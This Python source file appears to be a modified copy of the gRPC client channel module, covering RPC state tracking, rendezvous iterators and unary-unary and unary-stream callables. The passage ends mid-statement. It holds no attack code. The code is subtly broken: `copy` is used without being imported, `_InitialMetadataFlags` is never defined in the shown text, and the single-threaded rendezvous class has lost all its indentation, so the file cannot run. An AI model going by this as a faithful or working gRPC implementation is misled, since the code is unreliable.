import functools
import logging
import os
import sys
import threading
import time
import grpc
import grpc.experimental
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)

_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)

_EMPTY_FLAGS = 0

# NOTE(rbellevi): No guarantees are given about the maintenance of this
# environment variable.
_DEFAULT_SINGLE_THREADED_UNARY_STREAM = os.getenv(
    "GRPC_SINGLE_THREADED_UNARY_STREAM") is not None

# Initial "due" operation sets for each RPC arity; an RPC is finished once all
# of its due operations have completed (see _RPCState.due / _handle_event).
_UNARY_UNARY_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.send_message,
    cygrpc.OperationType.send_close_from_client,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_message,
    cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.send_message,
    cygrpc.OperationType.send_close_from_client,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_message,
    cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
    cygrpc.OperationType.send_initial_metadata,
    cygrpc.OperationType.receive_initial_metadata,
    cygrpc.OperationType.receive_status_on_client,
)

_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
    'Exception calling channel subscription callback!')

# repr() templates for terminated RPCs (the OK variant omits debug_error_string).
_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
                              '\tstatus = {}\n'
                              '\tdetails = "{}"\n'
                              '>')

_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<{} of RPC that terminated with:\n'
                                  '\tstatus = {}\n'
                                  '\tdetails = "{}"\n'
                                  '\tdebug_error_string = "{}"\n'
                                  '>')
def _deadline(timeout):
    """Translate a relative timeout in seconds into an absolute deadline.

    Returns None when *timeout* is None (an RPC without a deadline).
    """
    if timeout is None:
        return None
    return time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
    """Build the details string reported when the server sent an unmapped status code."""
    return 'Server sent unknown code %s and details "%s"' % (
        unknown_cygrpc_code, details)
class _RPCState(object):
    """Mutable client-side state of a single RPC; fields are guarded by self.condition."""

    def __init__(self, due, initial_metadata, trailing_metadata, code, details):
        # All mutable fields below must be read and written under this condition.
        self.condition = threading.Condition()
        # The cygrpc.OperationType objects representing events due from the RPC's
        # completion queue.
        self.due = set(due)
        self.initial_metadata = initial_metadata
        self.response = None
        self.trailing_metadata = trailing_metadata
        self.code = code
        self.details = details
        self.debug_error_string = None
        # The semantics of grpc.Future.cancel and grpc.Future.cancelled are
        # slightly wonky, so they have to be tracked separately from the rest of the
        # result of the RPC. This field tracks whether cancellation was requested
        # prior to termination of the RPC.
        self.cancelled = False
        self.callbacks = []
        self.fork_epoch = cygrpc.get_fork_epoch()

    def reset_postfork_child(self):
        # Give the child process a freshly-initialized condition/lock after fork.
        self.condition = threading.Condition()
def _abort(state, code, details):
    """Mark *state* as terminated with (code, details) unless already terminated.

    Callers in this module hold state.condition. Unset metadata fields are
    normalized to empty tuples.
    """
    if state.code is not None:
        return
    state.code = code
    state.details = details
    if state.initial_metadata is None:
        state.initial_metadata = ()
    state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
    """Fold one completion-queue *event* into *state* (caller holds state.condition).

    Removes each completed operation from state.due, records metadata, the
    deserialized response, and final status, and returns the registered
    callbacks for the caller to run outside the lock once the RPC terminates.
    """
    callbacks = []
    for batch_operation in event.batch_operations:
        operation_type = batch_operation.type()
        state.due.remove(operation_type)
        if operation_type == cygrpc.OperationType.receive_initial_metadata:
            state.initial_metadata = batch_operation.initial_metadata()
        elif operation_type == cygrpc.OperationType.receive_message:
            serialized_response = batch_operation.message()
            if serialized_response is not None:
                response = _common.deserialize(serialized_response,
                                               response_deserializer)
                if response is None:
                    details = 'Exception deserializing response!'
                    _abort(state, grpc.StatusCode.INTERNAL, details)
                else:
                    state.response = response
        elif operation_type == cygrpc.OperationType.receive_status_on_client:
            state.trailing_metadata = batch_operation.trailing_metadata()
            if state.code is None:
                raw_code = batch_operation.code()
                code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(raw_code)
                if code is None:
                    state.code = grpc.StatusCode.UNKNOWN
                    # Report the actual unmapped cygrpc code; previously the
                    # None result of the mapping lookup was passed here,
                    # yielding 'Server sent unknown code None ...'.
                    state.details = _unknown_code_details(
                        raw_code, batch_operation.details())
                else:
                    state.code = code
                    state.details = batch_operation.details()
                state.debug_error_string = batch_operation.error_string()
    callbacks.extend(state.callbacks)
    state.callbacks = None
    return callbacks
def _event_handler(state, response_deserializer):
    """Return a channel-spin callback that folds completion events into *state*.

    The returned handler reports True ("done") when no operations remain due
    and the state belongs to the current fork epoch.
    """

    def handle_event(event):
        with state.condition:
            callbacks = _handle_event(event, state, response_deserializer)
            state.condition.notify_all()
            done = not state.due
        for callback in callbacks:
            try:
                callback()
            except Exception as e:  # pylint: disable=broad-except
                # NOTE(rbellevi): We suppress but log errors here so as not to
                # kill the channel spin thread.
                # Use the module logger (consistent with the rest of this file)
                # and repr(callback): callbacks registered via add_callback()
                # are arbitrary callables and need not have a .func attribute,
                # which previously raised AttributeError inside this handler.
                _LOGGER.error('Exception in callback %s: %s', repr(callback),
                              repr(e))
        return done and state.fork_epoch >= cygrpc.get_fork_epoch()

    return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
                              event_handler):
    """Consume a request iterator supplied by the user.

    Spawns a fork-managed daemon thread that pulls requests from the user's
    iterator, serializes them, and sends them on *call*, then half-closes the
    stream when the iterator is exhausted. Errors in the user iterator or in
    serialization cancel and abort the RPC.
    """

    def consume_request_iterator():  # pylint: disable=too-many-branches
        # Iterate over the request iterator until it is exhausted or an error
        # condition is encountered.
        while True:
            return_from_user_request_generator_invoked = False
            try:
                # The thread may die in user-code. Do not block fork for this.
                cygrpc.enter_user_request_generator()
                request = next(request_iterator)
            except StopIteration:
                break
            except Exception:  # pylint: disable=broad-except
                cygrpc.return_from_user_request_generator()
                return_from_user_request_generator_invoked = True
                code = grpc.StatusCode.UNKNOWN
                details = 'Exception iterating requests!'
                _LOGGER.exception(details)
                call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
                            details)
                _abort(state, code, details)
                return
            finally:
                # Guard against double-invocation from the except path above.
                if not return_from_user_request_generator_invoked:
                    cygrpc.return_from_user_request_generator()
            serialized_request = _common.serialize(request, request_serializer)
            with state.condition:
                if state.code is None and not state.cancelled:
                    if serialized_request is None:
                        code = grpc.StatusCode.INTERNAL
                        details = 'Exception serializing request!'
                        call.cancel(
                            _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
                            details)
                        _abort(state, code, details)
                        return
                    else:
                        operations = (cygrpc.SendMessageOperation(
                            serialized_request, _EMPTY_FLAGS),)
                        operating = call.operate(operations, event_handler)
                        if operating:
                            state.due.add(cygrpc.OperationType.send_message)
                        else:
                            return

                        # Wait until the previous send completes (or the RPC
                        # terminates) before pulling the next request.
                        def _done():
                            return (state.code is not None or
                                    cygrpc.OperationType.send_message
                                    not in state.due)

                        _common.wait(state.condition.wait,
                                     _done,
                                     spin_cb=functools.partial(
                                         cygrpc.block_if_fork_in_progress,
                                         state))
                        if state.code is not None:
                            return
                else:
                    return
        # Iterator exhausted: half-close the request stream.
        with state.condition:
            if state.code is None:
                operations = (
                    cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
                operating = call.operate(operations, event_handler)
                if operating:
                    state.due.add(cygrpc.OperationType.send_close_from_client)

    consumption_thread = cygrpc.ForkManagedThread(
        target=consume_request_iterator)
    # NOTE(review): setDaemon is a deprecated alias for .daemon = True; kept
    # as-is since ForkManagedThread's exact API is not visible here.
    consumption_thread.setDaemon(True)
    consumption_thread.start()
def _rpc_state_string(class_name, rpc_state):
    """Calculates error string for RPC."""
    with rpc_state.condition:
        code = rpc_state.code
        if code is None:
            # RPC still in progress: nothing to report yet.
            return '<{} object>'.format(class_name)
        if code is grpc.StatusCode.OK:
            return _OK_RENDEZVOUS_REPR_FORMAT.format(class_name, code,
                                                     rpc_state.details)
        return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
            class_name, code, rpc_state.details, rpc_state.debug_error_string)
class _InactiveRpcError(grpc.RpcError, grpc.Call, grpc.Future):
    """An RPC error not tied to the execution of a particular RPC.

    The RPC represented by the state object must not be in-progress or
    cancelled.

    Attributes:
      _state: An instance of _RPCState.
    """

    def __init__(self, state):
        # Take an immutable snapshot of the terminated RPC's state so this
        # error object is safe to use after the original state changes.
        with state.condition:
            self._state = _RPCState((), copy.deepcopy(state.initial_metadata),
                                    copy.deepcopy(state.trailing_metadata),
                                    state.code, copy.deepcopy(state.details))
            self._state.response = copy.copy(state.response)
            self._state.debug_error_string = copy.copy(state.debug_error_string)

    def initial_metadata(self):
        return self._state.initial_metadata

    def trailing_metadata(self):
        return self._state.trailing_metadata

    def code(self):
        return self._state.code

    def details(self):
        return _common.decode(self._state.details)

    def debug_error_string(self):
        return _common.decode(self._state.debug_error_string)

    def _repr(self):
        return _rpc_state_string(self.__class__.__name__, self._state)

    def __repr__(self):
        return self._repr()

    def __str__(self):
        return self._repr()

    def cancel(self):
        """See grpc.Future.cancel."""
        return False

    def cancelled(self):
        """See grpc.Future.cancelled."""
        return False

    def running(self):
        """See grpc.Future.running."""
        return False

    def done(self):
        """See grpc.Future.done."""
        return True

    def result(self, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.result."""
        # The error itself is both the RpcError and the Future's exception.
        raise self

    def exception(self, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.exception."""
        return self

    def traceback(self, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.traceback."""
        try:
            raise self
        except grpc.RpcError:
            return sys.exc_info()[2]

    def add_done_callback(self, fn, timeout=None):  # pylint: disable=unused-argument
        """See grpc.Future.add_done_callback."""
        # Already terminated, so the callback runs immediately.
        fn(self)
class _Rendezvous(grpc.RpcError, grpc.RpcContext):
    """An RPC iterator.

    Attributes:
      _state: An instance of _RPCState.
      _call: An instance of SegregatedCall or IntegratedCall.
        In either case, the _call object is expected to have operate, cancel,
        and next_event methods.
      _response_deserializer: A callable taking bytes and return a Python
        object.
      _deadline: A float representing the deadline of the RPC in seconds. Or
        possibly None, to represent an RPC with no deadline at all.
    """

    def __init__(self, state, call, response_deserializer, deadline):
        super(_Rendezvous, self).__init__()
        self._state = state
        self._call = call
        self._response_deserializer = response_deserializer
        self._deadline = deadline

    def is_active(self):
        """See grpc.RpcContext.is_active"""
        with self._state.condition:
            return self._state.code is None

    def time_remaining(self):
        """See grpc.RpcContext.time_remaining"""
        with self._state.condition:
            if self._deadline is None:
                return None
            else:
                return max(self._deadline - time.time(), 0)

    def cancel(self):
        """See grpc.RpcContext.cancel"""
        with self._state.condition:
            if self._state.code is None:
                code = grpc.StatusCode.CANCELLED
                details = 'Locally cancelled by application!'
                self._call.cancel(
                    _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
                self._state.cancelled = True
                _abort(self._state, code, details)
                self._state.condition.notify_all()
                return True
            else:
                # RPC already terminated; nothing to cancel.
                return False

    def add_callback(self, callback):
        """See grpc.RpcContext.add_callback"""
        with self._state.condition:
            if self._state.callbacks is None:
                # RPC already terminated and callbacks were drained.
                return False
            else:
                self._state.callbacks.append(callback)
                return True

    def __iter__(self):
        return self

    def next(self):
        # Python 2 iterator protocol.
        return self._next()

    def __next__(self):
        return self._next()

    def _next(self):
        # Implemented by subclasses (single- vs multi-threaded strategies).
        raise NotImplementedError()

    def debug_error_string(self):
        raise NotImplementedError()

    def _repr(self):
        return _rpc_state_string(self.__class__.__name__, self._state)

    def __repr__(self):
        return self._repr()

    def __str__(self):
        return self._repr()

    def __del__(self):
        # Best-effort cancellation if the iterator is garbage-collected while
        # the RPC is still in progress.
        with self._state.condition:
            if self._state.code is None:
                self._state.code = grpc.StatusCode.CANCELLED
                self._state.details = 'Cancelled upon garbage collection!'
                self._state.cancelled = True
                self._call.cancel(
                    _common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
                    self._state.details)
                self._state.condition.notify_all()
class _SingleThreadedRendezvous(_Rendezvous, grpc.Call, grpc.Future): # pylint: disable=too-many-ancestors
"""An RPC iterator operating entirely on a single thread.
The __next__ method of _SingleThreadedRendezvous does not depend on the
existence of any other thread, including the "channel spin thread".
However, this means that its interface is entirely synchronous. So this
class cannot completely fulfill the grpc.Future interface. The result,
exception, and traceback methods will never block and will instead raise
an exception if calling the method would result in blocking.
This means that these methods are safe to call from add_done_callback
handlers.
"""
def _is_complete(self):
return self._state.code is not None
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
"""Returns the result of the computation or raises its exception.
This method will never block. Instead, it will raise an exception
if calling this method would otherwise result in blocking.
Since this method will never block, any `timeout` argument passed will
be ignored.
"""
del timeout
with self._state.condition:
if not self._is_complete():
raise grpc.experimental.UsageError(
"_SingleThreadedRendezvous only supports result() when the RPC is complete."
)
if self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
"""Return the exception raised by the computation.
This method will never block. Instead, it will raise an exception
if calling this method would otherwise result in blocking.
Since this method will never block, any `timeout` argument passed will
be ignored.
"""
del timeout
with self._state.condition:
if not self._is_complete():
raise grpc.experimental.UsageError(
"_SingleThreadedRendezvous only supports exception() when the RPC is complete."
)
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
This method will never block. Instead, it will raise an exception
if calling this method would otherwise result in blocking.
Since this method will never block, any `timeout` argument passed will
be ignored.
"""
del timeout
with self._state.condition:
if not self._is_complete():
raise grpc.experimental.UsageError(
"_SingleThreadedRendezvous only supports traceback() when the RPC is complete."
)
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(functools.partial(fn, self))
return
fn(self)
def initial_metadata(self):
"""See grpc.Call.initial_metadata"""
with self._state.condition:
# NOTE(gnossen): Based on our initial call batch, we are guaranteed
# to receive initial metadata before any messages.
while self._state.initial_metadata is None:
self._consume_next_event()
return self._state.initial_metadata
def trailing_metadata(self):
"""See grpc.Call.trailing_metadata"""
with self._state.condition:
if self._state.trailing_metadata is None:
raise grpc.experimental.UsageError(
"Cannot get trailing metadata until RPC is completed.")
return self._state.trailing_metadata
def code(self):
"""See grpc.Call.code"""
with self._state.condition:
if self._state.code is None:
raise grpc.experimental.UsageError(
"Cannot get code until RPC is completed.")
return self._state.code
def details(self):
"""See grpc.Call.details"""
with self._state.condition:
if self._state.details is None:
raise grpc.experimental.UsageError(
"Cannot get details until RPC is completed.")
return _common.decode(self._state.details)
def _consume_next_event(self):
event = self._call.next_event()
with self._state.condition:
callbacks = _handle_event(event, self._state,
self._response_deserializer)
for callback in callbacks:
# NOTE(gnossen): We intentionally allow exceptions to bubble up
# to the user when running on a single thread.
callback()
return event
def _next_response(self):
while True:
self._consume_next_event()
with self._state.condition:
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
    def _next(self):
        """Starts a receive-message batch (if the RPC is live) and blocks
        in _next_response for the result."""
        with self._state.condition:
            if self._state.code is None:
                # Kick off a receive; the tag is None because events are
                # consumed inline on this thread, not by a spin thread.
                operating = self._call.operate(
                    (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),), None)
                if operating:
                    self._state.due.add(cygrpc.OperationType.receive_message)
            elif self._state.code is grpc.StatusCode.OK:
                raise StopIteration()
            else:
                raise self
        return self._next_response()
    def debug_error_string(self):
        """Returns the debug error string; raises until the RPC completes."""
        with self._state.condition:
            if self._state.debug_error_string is None:
                raise grpc.experimental.UsageError(
                    "Cannot get debug error string until RPC is completed.")
            return _common.decode(self._state.debug_error_string)
class _MultiThreadedRendezvous(_Rendezvous, grpc.Call, grpc.Future): # pylint: disable=too-many-ancestors
    """An RPC iterator that depends on a channel spin thread.
    This iterator relies upon a per-channel thread running in the background,
    dequeueing events from the completion queue, and notifying threads waiting
    on the threading.Condition object in the _RPCState object.
    This extra thread allows _MultiThreadedRendezvous to fulfill the grpc.Future interface
    and to mediate a bidirection streaming RPC.
    """
    def initial_metadata(self):
        """See grpc.Call.initial_metadata"""
        with self._state.condition:
            # Block until the spin thread has recorded initial metadata.
            def _done():
                return self._state.initial_metadata is not None
            _common.wait(self._state.condition.wait, _done)
            return self._state.initial_metadata
    def trailing_metadata(self):
        """See grpc.Call.trailing_metadata"""
        with self._state.condition:
            # Blocks until the RPC terminates (trailing metadata recorded).
            def _done():
                return self._state.trailing_metadata is not None
            _common.wait(self._state.condition.wait, _done)
            return self._state.trailing_metadata
    def code(self):
        """See grpc.Call.code"""
        with self._state.condition:
            # Blocks until a terminal status code is available.
            def _done():
                return self._state.code is not None
            _common.wait(self._state.condition.wait, _done)
            return self._state.code
    def details(self):
        """See grpc.Call.details"""
        with self._state.condition:
            # Blocks until status details are available.
            def _done():
                return self._state.details is not None
            _common.wait(self._state.condition.wait, _done)
            return _common.decode(self._state.details)
    def debug_error_string(self):
        """Returns the debug error string, blocking until it is available."""
        with self._state.condition:
            def _done():
                return self._state.debug_error_string is not None
            _common.wait(self._state.condition.wait, _done)
            return _common.decode(self._state.debug_error_string)
    def cancelled(self):
        # See grpc.Future.cancelled.
        with self._state.condition:
            return self._state.cancelled
    def running(self):
        # See grpc.Future.running: true while no terminal code is set.
        with self._state.condition:
            return self._state.code is None
    def done(self):
        # See grpc.Future.done.
        with self._state.condition:
            return self._state.code is not None
    def _is_complete(self):
        # Caller must hold self._state.condition.
        return self._state.code is not None
    def result(self, timeout=None):
        """Returns the result of the computation or raises its exception.
        See grpc.Future.result for the full API contract.
        """
        with self._state.condition:
            timed_out = _common.wait(self._state.condition.wait,
                                     self._is_complete,
                                     timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    return self._state.response
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    # Non-OK terminal status: this object is itself the RpcError.
                    raise self
    def exception(self, timeout=None):
        """Return the exception raised by the computation.
        See grpc.Future.exception for the full API contract.
        """
        with self._state.condition:
            timed_out = _common.wait(self._state.condition.wait,
                                     self._is_complete,
                                     timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    return None
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    # Returned (not raised): the rendezvous doubles as the error.
                    return self
    def traceback(self, timeout=None):
        """Access the traceback of the exception raised by the computation.
        See grpc.future.traceback for the full API contract.
        """
        with self._state.condition:
            timed_out = _common.wait(self._state.condition.wait,
                                     self._is_complete,
                                     timeout=timeout)
            if timed_out:
                raise grpc.FutureTimeoutError()
            else:
                if self._state.code is grpc.StatusCode.OK:
                    return None
                elif self._state.cancelled:
                    raise grpc.FutureCancelledError()
                else:
                    # Raise and immediately catch to materialize a traceback.
                    try:
                        raise self
                    except grpc.RpcError:
                        return sys.exc_info()[2]
    def add_done_callback(self, fn):
        """See grpc.Future.add_done_callback."""
        with self._state.condition:
            if self._state.code is None:
                self._state.callbacks.append(functools.partial(fn, self))
                return
        # Already terminated: call back immediately, outside the lock.
        fn(self)
    def _next(self):
        """Fetches the next response message for iteration.

        Starts a receive batch handled by the channel spin thread, then
        waits on the condition until a response or terminal status arrives.
        """
        with self._state.condition:
            if self._state.code is None:
                event_handler = _event_handler(self._state,
                                               self._response_deserializer)
                operating = self._call.operate(
                    (cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
                    event_handler)
                if operating:
                    self._state.due.add(cygrpc.OperationType.receive_message)
            elif self._state.code is grpc.StatusCode.OK:
                raise StopIteration()
            else:
                raise self
            def _response_ready():
                return (self._state.response is not None or
                        (cygrpc.OperationType.receive_message
                         not in self._state.due and
                         self._state.code is not None))
            _common.wait(self._state.condition.wait, _response_ready)
            if self._state.response is not None:
                response = self._state.response
                self._state.response = None
                return response
            elif cygrpc.OperationType.receive_message not in self._state.due:
                if self._state.code is grpc.StatusCode.OK:
                    raise StopIteration()
                elif self._state.code is not None:
                    raise self
def _start_unary_request(request, timeout, request_serializer):
    """Serializes a unary request and computes its deadline.

    Returns a (deadline, serialized_request, error) triple; exactly one of
    serialized_request / error is None.
    """
    deadline = _deadline(timeout)
    serialized_request = _common.serialize(request, request_serializer)
    if serialized_request is not None:
        return deadline, serialized_request, None
    # Serialization failed: surface an INTERNAL-status error to the caller.
    failure_state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
                              'Exception serializing request!')
    return deadline, None, _InactiveRpcError(failure_state)
def _end_unary_response_blocking(state, call, with_call, deadline):
    """Finishes a blocking unary invocation.

    Returns the response (optionally paired with a grpc.Call) on OK status;
    raises an _InactiveRpcError otherwise.
    """
    if state.code is not grpc.StatusCode.OK:
        raise _InactiveRpcError(state)
    if with_call:
        rendezvous = _MultiThreadedRendezvous(state, call, None, deadline)
        return state.response, rendezvous
    return state.response
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
    """Builds the two operation batches for a stream-unary invocation:
    the primary send/receive batch and the initial-metadata batch."""
    primary_operations = (
        cygrpc.SendInitialMetadataOperation(metadata, initial_metadata_flags),
        cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
        cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
    )
    initial_metadata_operations = (
        cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),)
    return (primary_operations, initial_metadata_operations)
def _stream_unary_invocation_operationses_and_tags(metadata,
                                                   initial_metadata_flags):
    """Pairs each stream-unary operation batch with a None tag."""
    operationses = _stream_unary_invocation_operationses(
        metadata, initial_metadata_flags)
    return tuple((operations, None) for operations in operationses)
def _determine_deadline(user_deadline):
    """Combines the user-supplied deadline with any deadline inherited from
    a parent server context; the earlier of the two wins."""
    parent_deadline = cygrpc.get_deadline_from_context()
    if parent_deadline is None:
        return user_deadline
    if user_deadline is None:
        return parent_deadline
    return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
    """Affords invoking a unary-unary RPC from client-side."""
    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()
    def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
        """Serializes the request and assembles the single operation batch.

        Returns (state, operations, deadline, rendezvous); on serialization
        failure state is None and rendezvous is the error to raise.
        """
        deadline, serialized_request, rendezvous = _start_unary_request(
            request, timeout, self._request_serializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        if serialized_request is None:
            return None, None, None, rendezvous
        else:
            state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
            operations = (
                cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                    initial_metadata_flags),
                cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
                cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
                cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
            )
            return state, operations, deadline, None
    def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
                  compression):
        """Runs the RPC synchronously on a segregated call (no spin thread)."""
        state, operations, deadline, rendezvous = self._prepare(
            request, timeout, metadata, wait_for_ready, compression)
        if state is None:
            raise rendezvous # pylint: disable-msg=raising-bad-type
        else:
            call = self._channel.segregated_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, _determine_deadline(deadline), metadata,
                None if credentials is None else credentials._credentials, ((
                    operations,
                    None,
                ),), self._context)
            event = call.next_event()
            _handle_event(event, state, self._response_deserializer)
            return state, call
    def __call__(self,
                 request,
                 timeout=None,
                 metadata=None,
                 credentials=None,
                 wait_for_ready=None,
                 compression=None):
        # Blocking invocation returning only the response message.
        state, call, = self._blocking(request, timeout, metadata, credentials,
                                      wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, False, None)
    def with_call(self,
                  request,
                  timeout=None,
                  metadata=None,
                  credentials=None,
                  wait_for_ready=None,
                  compression=None):
        # Blocking invocation returning (response, grpc.Call).
        state, call, = self._blocking(request, timeout, metadata, credentials,
                                      wait_for_ready, compression)
        return _end_unary_response_blocking(state, call, True, None)
    def future(self,
               request,
               timeout=None,
               metadata=None,
               credentials=None,
               wait_for_ready=None,
               compression=None):
        # Asynchronous invocation: events are handled by the channel spin
        # thread via the managed call; returns a Future-like rendezvous.
        state, operations, deadline, rendezvous = self._prepare(
            request, timeout, metadata, wait_for_ready, compression)
        if state is None:
            raise rendezvous # pylint: disable-msg=raising-bad-type
        else:
            event_handler = _event_handler(state, self._response_deserializer)
            call = self._managed_call(
                cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
                self._method, None, deadline, metadata,
                None if credentials is None else credentials._credentials,
                (operations,), event_handler, self._context)
            return _MultiThreadedRendezvous(state, call,
                                            self._response_deserializer,
                                            deadline)
class _SingleThreadedUnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
    """Affords invoking a unary-stream RPC without a channel spin thread;
    the returned rendezvous drives the completion queue on the caller's
    thread."""
    # pylint: disable=too-many-arguments
    def __init__(self, channel, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()
    def __call__(  # pylint: disable=too-many-locals
            self,
            request,
            timeout=None,
            metadata=None,
            credentials=None,
            wait_for_ready=None,
            compression=None):
        deadline = _deadline(timeout)
        serialized_request = _common.serialize(request,
                                               self._request_serializer)
        if serialized_request is None:
            state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
                              'Exception serializing request!')
            raise _InactiveRpcError(state)
        state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
        call_credentials = None if credentials is None else credentials._credentials
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        augmented_metadata = _compression.augment_metadata(
            metadata, compression)
        # Three batches: sends, terminal status, and initial metadata; all
        # tagged None because events are consumed inline (segregated call).
        operations = (
            (cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                 initial_metadata_flags),
             cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
             cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS)),
            (cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),),
            (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
        )
        operations_and_tags = tuple((ops, None) for ops in operations)
        call = self._channel.segregated_call(
            cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
            None, _determine_deadline(deadline), metadata, call_credentials,
            operations_and_tags, self._context)
        return _SingleThreadedRendezvous(state, call,
                                         self._response_deserializer, deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
    """Affords invoking a unary-stream RPC mediated by the channel spin
    thread (multi-threaded variant)."""
    # pylint: disable=too-many-arguments
    def __init__(self, channel, managed_call, method, request_serializer,
                 response_deserializer):
        self._channel = channel
        self._managed_call = managed_call
        self._method = method
        self._request_serializer = request_serializer
        self._response_deserializer = response_deserializer
        self._context = cygrpc.build_census_context()
    def __call__(  # pylint: disable=too-many-locals
            self,
            request,
            timeout=None,
            metadata=None,
            credentials=None,
            wait_for_ready=None,
            compression=None):
        deadline, serialized_request, rendezvous = _start_unary_request(
            request, timeout, self._request_serializer)
        initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
            wait_for_ready)
        if serialized_request is None:
            raise rendezvous # pylint: disable-msg=raising-bad-type
        else:
            augmented_metadata = _compression.augment_metadata(
                metadata, compression)
            state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
            # Two batches: the send/status batch and the initial-metadata batch.
            operationses = (
                (
                    cygrpc.SendInitialMetadataOperation(augmented_metadata,
                                                        initial_metadata_flags),
                    cygrpc.SendMessageOperation(serialized_request,
                                                _EMPTY_FLAGS),
                    cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
                    cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
                ),
                (cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
            )
            call = self._managed_call(
